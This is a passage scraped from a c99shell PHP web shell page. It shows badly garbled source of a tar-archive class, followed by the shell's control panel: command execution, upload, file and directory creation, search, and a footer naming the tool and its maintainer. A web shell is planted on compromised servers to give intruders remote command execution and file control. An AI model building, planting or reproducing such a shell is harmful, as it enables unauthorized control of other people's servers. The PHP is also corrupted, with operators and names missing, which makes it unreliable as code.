$this->errors[] = __('Cannot write to file').' '.$header['filename'];
                    return 
false;
                } else {
                    
$decr floor($header['size']/512);
                    for (
$i 0$i $decr$i++) {
                        
$content $this->readBlock();
                        
fwrite($destination$content512);
                    }
                    if ((
$header['size'] % 512) != 0) {
                        
$content $this->readBlock();
                        
fwrite($destination$content, ($header['size'] % 512));
                    }
                    
fclose($destination);
                    
touch($header['filename'], $header['time']);
                }
                
clearstatcache();
                if (
filesize($header['filename']) != $header['size']) {
                    
$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
                    return 
false;
                }
            }
            if ((
$file_dir dirname($header['filename'])) == $header['filename']) $file_dir '';
            if ((
substr($header['filename'], 01) == '/') && ($file_dir == '')) $file_dir '/';
            
$this->dirs[] = $file_dir;
            
$this->files[] = $header['filename'];
    
        }
        return 
true;
    }

    function 
dirCheck($dir){
        
$parent_dir dirname($dir);

        if ((@
is_dir($dir)) or ($dir == ''))
            return 
true;

        if ((
$parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
            return 
false;

        if (!
mkdir($dir0777)){
            
$this->errors[] = __('Cannot create directory').' '.$dir;
            return 
false;
        }
        return 
true;
    }

    function 
readHeader($binaryData, &$header){
        if (
strlen($binaryData)==0){
            
$header['filename'] = '';
            return 
true;
        }

        if (
strlen($binaryData) != 512){
            
$header['filename'] = '';
            
$this->__('Invalid block size').': '.strlen($binaryData);
            return 
false;
        }

        
$checksum 0;
        for (
$i 0$i 148$i++) $checksum+=ord(substr($binaryData$i1));
        for (
$i 148$i 156$i++) $checksum += ord(' ');
        for (
$i 156$i 512$i++) $checksum+=ord(substr($binaryData$i1));

        
$unpack_data unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor'$binaryData);

        
$header['checksum'] = OctDec(trim($unpack_data['checksum']));
        if (
$header['checksum'] != $checksum){
            
$header['filename'] = '';
            if ((
$checksum == 256) && ($header['checksum'] == 0))     return true;
            
$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
            return 
false;
        }

        if ((
$header['typeflag'] = $unpack_data['typeflag']) == '5')    $header['size'] = 0;
        
$header['filename'] = trim($unpack_data['filename']);
        
$header['mode'] = OctDec(trim($unpack_data['mode']));
        
$header['user_id'] = OctDec(trim($unpack_data['user_id']));
        
$header['group_id'] = OctDec(trim($unpack_data['group_id']));
        
$header['size'] = OctDec(trim($unpack_data['size']));
        
$header['time'] = OctDec(trim($unpack_data['time']));
        return 
true;
    }

    function 
writeHeader($filename$keep_filename){
        
$packF 'a100a8a8a8a12A12';
        
$packL 'a1a100a6a2a32a32a8a8a155a12';
        if (
strlen($keep_filename)<=0$keep_filename $filename;
        
$filename_ready $this->makeGoodPath($keep_filename);

        if (
strlen($filename_ready) > 99){                            //write long header
        
$dataFirst pack($packF'././LongLink'000sprintf('%11s 'DecOct(strlen($filename_ready))), 0);
        
$dataLast pack($packL'L''''''''''''''''''');

        
//  Calculate the checksum
        
$checksum 0;
        
//  First part of the header
        
for ($i 0$i 148$i++)
            
$checksum += ord(substr($dataFirst$i1));
        
//  Ignore the checksum value and replace it by ' ' (space)
        
for ($i 148$i 156$i++)
            
$checksum += ord(' ');
        
//  Last part of the header
        
for ($i 156$j=0$i 512$i++, $j++)
            
$checksum += ord(substr($dataLast$j1));
        
//  Write the first 148 bytes of the header in the archive
        
$this->writeBlock($dataFirst148);
        
//  Write the calculated checksum
        
$checksum sprintf('%6s 'DecOct($checksum));
        
$binaryData pack('a8'$checksum);
        
$this->writeBlock($binaryData8);
        
//  Write the last 356 bytes of the header in the archive
        
$this->writeBlock($dataLast356);

        
$tmp_filename $this->makeGoodPath($filename_ready);

        
$i 0;
            while ((
$buffer substr($tmp_filename, (($i++)*512), 512)) != ''){
                
$binaryData pack('a512'$buffer);
                
$this->writeBlock($binaryData);
            }
        return 
true;
        }
        
$file_info stat($filename);
        if (@
is_dir($filename)){
            
$typeflag '5';
            
$size sprintf('%11s 'DecOct(0));
        } else {
            
$typeflag '';
            
clearstatcache();
            
$size sprintf('%11s 'DecOct(filesize($filename)));
        }
        
$dataFirst pack($packF$filename_readysprintf('%6s 'DecOct(fileperms($filename))), sprintf('%6s 'DecOct($file_info[4])), sprintf('%6s 'DecOct($file_info[5])), $sizesprintf('%11s'DecOct(filemtime($filename))));
        
$dataLast pack($packL$typeflag'''''''''''''''''');
        
$checksum 0;
        for (
$i 0$i 148$i++) $checksum += ord(substr($dataFirst$i1));
        for (
$i 148$i 156$i++) $checksum += ord(' ');
        for (
$i 156$j 0$i 512$i++, $j++) $checksum += ord(substr($dataLast$j1));
        
$this->writeBlock($dataFirst148);
        
$checksum sprintf('%6s 'DecOct($checksum));
        
$binaryData pack('a8'$checksum);
        
$this->writeBlock($binaryData8);
        
$this->writeBlock($dataLast356);
        return 
true;
    }

    function 
openWrite(){
        if (
$this->isGzipped)
            
$this->tmp_file gzopen($this->archive_name'wb9f');
        else
            
$this->tmp_file fopen($this->archive_name'wb');

        if (!(
$this->tmp_file)){
            
$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
            return 
false;
        }
        return 
true;
    }

    function 
readBlock(){
        if (
is_resource($this->tmp_file)){
            if (
$this->isGzipped)
                
$block gzread($this->tmp_file512);
            else
                
$block fread($this->tmp_file512);
        } else    
$block '';

        return 
$block;
    }

    function 
writeBlock($data$length 0){
        if (
is_resource($this->tmp_file)){
        
            if (
$length === 0){
                if (
$this->isGzipped)
                    
gzputs($this->tmp_file$data);
                else
                    
fputs($this->tmp_file$data);
            } else {
                if (
$this->isGzipped)
                    
gzputs($this->tmp_file$data$length);
                else
                    
fputs($this->tmp_file$data$length);
            }
        }
    }

    function 
closeTmpFile(){
        if (
is_resource($this->tmp_file)){
            if (
$this->isGzipped)
                
gzclose($this->tmp_file);
            else
                
fclose($this->tmp_file);

            
$this->tmp_file 0;
        }
    }

    function 
makeGoodPath($path){
        if (
strlen($path)>0){
            
$path str_replace('\\''/'$path);
            
$partPath explode('/'$path);
            
$els count($partPath)-1;
            for (
$i $els$i>=0$i--){
                if (
$partPath[$i] == '.'){
                    
//  Ignore this directory
                
} elseif ($partPath[$i] == '..'){
                    
$i--;
                }
                elseif ((
$partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }    else
                    
$result $partPath[$i].($i!=$els '/'.$result '');
            }
        } else 
$result '';
        
        return 
$result;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1639 ]--